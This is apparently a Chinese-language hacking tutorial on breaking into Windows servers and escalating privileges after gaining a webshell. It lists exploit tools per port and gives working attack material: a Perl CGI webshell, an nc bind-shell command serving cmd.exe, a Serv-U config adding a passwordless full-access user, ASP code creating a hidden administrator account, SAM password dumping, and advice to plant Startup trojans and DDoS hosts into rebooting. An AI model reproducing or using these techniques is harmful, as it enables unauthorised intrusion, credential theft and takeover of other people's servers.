當前位置:成語大全網 - 新華字典 - 如何找漏洞,又怎樣利用它提權

如何找漏洞,又怎樣利用它提權

1. 1433端口入侵

scanport.exe 查有1433的機器

SQLScanPass.exe 進行字典暴破(字典是關鍵)

最後 SQLTools.exe入侵

對sql的sp2及以下的系統,可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本機端口 sqlhelloF.exe 入侵ip 1433 本機ip 本機端口

(以上反向的,測試成功)

sqlhelloz.exe 入侵ip 1433 (這個是正向連接)

2. 4899端口入侵

用4899過濾器.exe,掃描空口令的機器

3. 3899的入侵

對很早的機器,可以試試3389的溢出(win3389ex.exe)

對2000的機器,可以試試字典暴破。(tscrack.exe)

4. 80入侵

對sp3以前的機器,可以用webdav入侵;

對bbs論壇,可以試試上傳漏洞(upfile.exe或dvup_delphi.exe)

可以利用SQL進行註入。(啊D的註入軟件)。

5. serv-u入侵(21端口)

對5. 004及以下系統,可用溢出入侵。(serv5004.exe)

對5.1.0.0及以下系統,可用本地提升權限。(servlocal.exe)

對serv-u的MD5加密密碼,可以用字典暴破。(crack.vbs)

輸入壹個被serv-u加密的密碼(34位長),通過與字典檔(dict.txt)的比較,得到密碼

6. 554端口

用real554.exe入侵。

7. 6129端口

用DameWare6129.exe入侵。

8. 系統漏洞

利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,

進行溢出入侵。

9. 3127等端口

可以利用doom病毒開的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。

10. 其他入侵

利用shanlu的入侵軟件入侵(WINNTAutoAttack.exe)。

經典IPC$入侵

本篇文章結合了許多高手提升權限的技巧和自己的壹些想法

當我們取得壹個webshell時候,下壹部要做的就是提升權限

個人總結如下:

1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\

看能否跳轉到這個目錄,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密碼,登陸

2.C:\WINNT\system32\config\

進這裏下它的SAM,破解用戶的密碼

用到破解sam密碼的軟件有LC,SAMinside

3.C:\Documents and Settings\All Users\「開始」菜單\程序\

看這裏能跳轉不,我們從這裏可以獲取好多有用的信息

可以看見好多快捷方式,我們壹般選擇Serv-U的,然後本地查看屬性,知道路徑後,看能否跳轉

進去後,如果有權限修改ServUDaemon.ini,加個用戶上去,密碼為空

[USER=WekweN|1]

Password=

HomeDir=c:\

TimeOut=600

Maintenance=System

Access1=C:\|RWAMELCDP

Access1=d:\|RWAMELCDP

Access1=f:\|RWAMELCDP

SKEYValues=

這個用戶具有最高權限,然後我們就可以ftp上去 quote site exec xxx 來提升權限

4.c:\winnt\system32\inetsrv\data\

就是這個目錄,同樣是erveryone 完全控制,我們所要做的就是把提升權限的工具上傳上去,然後執行

5.看能否跳轉到如下目錄

c:\php, 用phpspy

c:\prel,有時候不壹定是這個目錄(同樣可以通過下載快捷方式看屬性獲知)用cgi的webshell

#!/usr/bin/perl

binmode(STDOUT);

syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);

$_ = $ENV{QUERY_STRING};

s/%20/ /ig;

s/%2f/\//ig;

$execthis = $_;

syswrite(STDOUT, "<HTML><PRE>\r\n", 13);

open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";

system($execthis);

syswrite(STDOUT, "\r\n</PRE></HTML>\r\n", 17);

close(STDERR);

close(STDOUT);

exit;

保存為cgi執行,

如果不行,可以試試 pl 擴展呢,把剛才的 cgi 文件改為 pl 文件,提交 mand"

Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"

現在是 IUSR 權限,提交:

localgroup administrators IUSR_anyhost /add"

6.可以成功運行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"來提升權限

用這個cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps

查看有特權的dll文件:idq.dll srv\asp.dll (不同的機子放的位置不壹定壹樣)

我們現在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\srv\srv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"

可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進去了

7.還可以用這段代碼試提升,好象效果不明顯

<%@codepage=936%><%Response.Expires=0

on error resume next

Session.TimeOut=50

Server.ScriptTimeout=3000

set lp=Server.CreateObject("WSCRIPT.NETWORK")

oz="WinNT://"&lp.ComputerName

Set ob=GetObject(oz)

Set oe=GetObject(oz&"/Administrators,group")

Set od=ob.Create("user","WekweN$")

od.SetPassword "WekweN" <-----密碼

od.SetInfo

Set of=GetObject(oz&"/WekweN$,user")

oe.Add(of.ADsPath)

Response.write "WekweN$ 超級帳號建立成功!"%>

用這段代碼檢查是否提升成功

<%@codepage=936%>

<%Response.Expires=0

on error resume next '查找Administrators組帳號

Set tN=server.CreateObject("Wscript.Network")

Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")

For Each admin in objGroup.Members

Response.write admin.Name&"<br>"

Next

if err then

Response.write "不行啊:Wscript.Network"

end if

%>

8.C:\Program Files\Java Web Start\

這裏如果可以,壹般很小,可以嘗試用jsp的webshell,聽說權限很小,本人沒有遇見過。

9.最後了,如果主機設置很變態,可以試下在c:\Documents and Settings\All Users\「開始」菜單\程序\啟動"寫入bat,vbs等木馬。

等到主機重啟或者妳ddos逼它重啟,來達到權限提升的目的。

總結起來說就是,找到有執行和寫入的目錄,管他什麽目錄,然後上傳提升工具,最後執行,三個字"找" "上""執"

以上是本人的拙見,大家有什麽好的方法多多分享